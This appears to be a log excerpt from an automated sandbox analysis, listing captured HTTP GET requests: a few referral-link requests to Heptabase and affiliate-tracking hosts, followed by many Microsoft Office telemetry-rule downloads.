              Source: global trafficHTTP traffic detected: GET /pr/grc/pk_gMoo12CUQTlAXRXiVjzxG5xoLjYpi7XR HTTP/1.1Host: get.heptabase.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com
              Source: global trafficHTTP traffic detected: GET /pr/grc/pk_gMoo12CUQTlAXRXiVjzxG5xoLjYpi7XR HTTP/1.1Host: grsm.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://app.heptabase.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pr/grc/pk_gMoo12CUQTlAXRXiVjzxG5xoLjYpi7XR HTTP/1.1Host: partnerlinks.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pr/grc/pk_gMoo12CUQTlAXRXiVjzxG5xoLjYpi7XR HTTP/1.1Host: grsm.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
